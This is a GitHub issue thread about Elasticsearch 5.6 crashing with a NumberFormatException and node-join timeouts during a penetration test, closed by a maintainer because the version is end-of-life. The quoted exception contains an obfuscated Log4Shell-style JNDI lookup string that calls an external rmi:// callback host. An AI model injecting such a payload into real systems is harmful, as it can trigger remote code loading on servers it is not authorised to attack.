### ISSUE TITLE
ES 5.6 Caused by: java.lang.NumberFormatException: For input string:  and cluster carshd

### ISSUE THREAD

**Issue by shawnloong** [elastic/elasticsearch#103493]
### Elasticsearch Version

5.6

### Java Version

1.8.0_161

### OS Version

centos 7.6

### Problem Description

Caused by: java.lang.NumberFormatException: For input string: "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://1202553066113kcppc.xtltjx.ceye.io/Ayf}"
        at sun.misc.FloatingDecimal.readJavaFormatString(FloatingDecimal.java:2043) ~[?:?]
        at sun.misc.FloatingDecimal.parseDouble(FloatingDecimal.java:110) ~[?:?]
        at java.lang.Double.parseDouble(Double.java:538) ~[?:1.8.0_161]
        at org.elasticsearch.index.mapper.NumberFieldMapper$NumberType.hasDecimalPart(NumberFieldMapper.java:890) ~[elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.index.mapper.NumberFieldMapper$NumberType$7.termQuery(NumberFieldMapper.java:742) ~[elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.index.mapper.NumberFieldMapper$NumberFieldType.termQuery(NumberFieldMapper.java:958) ~[elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.index.query.TermQueryBuilder.doToQuery(TermQueryBuilder.java:143) ~[elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.index.query.AbstractQueryBuilder.toQuery(AbstractQueryBuilder.java:96) ~[elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.index.query.BoolQueryBuilder.addBooleanClauses(BoolQueryBuilder.java:444) ~[elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.index.query.BoolQueryBuilder.doToQuery(BoolQueryBuilder.java:418) ~[elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.index.query.AbstractQueryBuilder.toQuery(AbstractQueryBuilder.java:96) ~[elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.index.query.QueryShardContext.lambda$toQuery$1(QueryShardContext.java:313) ~[elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.index.query.QueryShardContext.toQuery(QueryShardContext.java:325) ~[elasticsearch-5.6.9.jar:5.6.9]

[2023-12-14T19:27:03,005][WARN ][o.e.d.z.ZenDiscovery     ] [xx-10-22] failed to validate incoming join request from node [{xx-22-20}{vZRWd2RjR9qtO8WYmZWhhg}{gCesIgIZSRmC-E4osjOcpg}{92.168..22.20}{92.168..22.20:9300}]
[2023-12-14T19:27:03,005][WARN ][o.e.d.z.ZenDiscovery     ] [xx-10-22] failed to validate incoming join request from node [{xx-22-20}{vZRWd2RjR9qtO8WYmZWhhg}{gCesIgIZSRmC-E4osjOcpg}{192.168.22.20}{92.168..22.20:9300}]
org.elasticsearch.ElasticsearchTimeoutException: java.util.concurrent.TimeoutException: Timeout waiting for task.
        at org.elasticsearch.transport.PlainTransportFuture.txGet(PlainTransportFuture.java:63) ~[elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.transport.PlainTransportFuture.txGet(PlainTransportFuture.java:33) ~[elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.discovery.zen.MembershipAction.sendValidateJoinRequestBlocking(MembershipAction.java:104) ~[elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.discovery.zen.ZenDiscovery.handleJoinRequest(ZenDiscovery.java:857) [elasticsearch-5.6.9.jar:5.6.9]
        at org.elasticsearch.discovery.zen.ZenDisc

### Steps to Reproduce

penetration test，

**Comment by DaveCTurner** [comment]
Thank you very much for your interest in Elasticsearch. Unfortunately the issue you have reported relates to Elasticsearch version 5.6 which is very old and has passed [end-of-life](https://www.elastic.co/support/eol). We will not investigate issues related to unsupported versions here on Github, so I am closing this to indicate that no action is needed from the Elasticsearch development team. It's possible that you will find a volunteer to help you with this issue on the [community forums](https://discuss.elastic.co/c/elastic-stack/elasticsearch/6), but our strong recommendation would be to upgrade to a supported version of Elasticsearch as a matter of some urgency. If you can reproduce your issue on a supported version then please open a fresh bug report.

Quoting the bug report form:

> Please also check your OS is [supported](https://www.elastic.co/support/matrix#show_os), and that the version of Elasticsearch has not passed [end-of-life](https://www.elastic.co/support/eol). If you are using an unsupported OS or an unsupported version then the issue is likely to be closed.
